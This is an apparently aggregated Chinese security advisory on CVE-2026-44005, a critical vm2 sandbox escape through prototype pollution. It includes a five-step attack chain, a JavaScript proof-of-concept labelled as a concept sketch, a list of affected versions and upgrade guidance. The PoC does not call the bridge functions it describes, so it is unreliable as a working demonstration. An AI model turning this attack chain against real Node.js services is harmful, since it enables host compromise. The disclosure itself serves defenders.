CVE-2026-44005 CVSS 10.0 严重

CVE-2026-44005 vm2沙箱逃逸漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44005

漏洞类型

沙箱逃逸, 原型污染, 远程代码执行

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

vm2

漏洞概述

vm2是Node.js的一个开源虚拟机/沙箱库。在3.9.6至3.10.5版本中，vm2的bridge机制暴露了针对宿主域内建原型的可变代理。攻击者可以利用这一点，通过otherReflectSet()和otherReflectDefineProperty()方法，将沙箱内的写入操作转发到底层宿主对象。这使得攻击者控制的JavaScript代码能够从沙箱内部修改共享的宿主Object.prototype、Array.prototype和Function.prototype，从而实现沙箱逃逸。

技术细节

该漏洞的核心在于vm2的bridge机制未能正确隔离宿主域与沙箱域的原型链。由于bridge暴露了可变代理，攻击者可以利用JavaScript的反射机制（Reflect API）直接操作宿主环境的内建对象原型。具体而言，攻击者在沙箱内执行的代码可以通过otherReflectSet或otherReflectDefineProperty函数，向宿主的Object.prototype等全局原型对象上注入属性或修改其行为。这种原型污染破坏了沙箱的隔离边界，允许攻击者绕过安全限制，进而获取对宿主系统的完全控制权，执行任意代码。

攻击链分析

STEP 1

reconnaissance

识别目标系统是否使用了存在漏洞的vm2版本（3.9.6至3.10.5）。

STEP 2

delivery

攻击者向目标Node.js应用发送包含恶意JavaScript代码的请求，该代码将在vm2沙箱环境中运行。

STEP 3

exploitation

恶意代码利用bridge暴露的可变代理，通过otherReflectSet或otherReflectDefineProperty方法修改宿主环境的Object.prototype等原型对象。

STEP 4

escape

由于宿主原型被污染，沙箱隔离失效，攻击者获得在宿主机上下文中执行代码的能力。

STEP 5

execution

攻击者执行任意系统命令，导致数据泄露、篡改或服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

const {VM} = require('vm2');
const vm = new VM();

// PoC Concept: Exploit prototype pollution via mutable proxies
const exploit = `
    const handler = {
        defineProperty(target, prop, descriptor) {
            // Forward the operation to the host object via the bridge
            return Reflect.defineProperty(target, prop, descriptor);
        }
    };
    
    // Target the host Object prototype
    const hostProto = Object.getPrototypeOf({});
    const proxy = new Proxy(hostProto, handler);
    
    // Attempt to pollute the host prototype
    try {
        Object.defineProperty(proxy, 'exploited', {
            value: true,
            writable: true,
            configurable: true,
            enumerable: true
        });
        
        if ({}.exploited === true) {
            console.log('Success: Host prototype polluted, sandbox escaped.');
        }
    } catch (e) {
        console.log('Exploit failed:', e.message);
    }
`;

vm.run(exploit);

影响范围

vm2 3.9.6

vm2 3.9.7

vm2 3.9.8

vm2 3.9.9

vm2 3.9.10

vm2 3.9.11

vm2 3.9.12

vm2 3.9.13

vm2 3.9.14

vm2 3.9.15

vm2 3.9.16

vm2 3.10.0

vm2 3.10.1

vm2 3.10.2

vm2 3.10.3

vm2 3.10.4

vm2 3.10.5

防御指南

临时缓解措施

建议立即检查项目依赖，将vm2库更新至修复版本3.11.0。在未升级前，应严格限制沙箱代码的权限，并监控Node.js进程是否存在异常的原型链修改行为，以减少潜在的攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表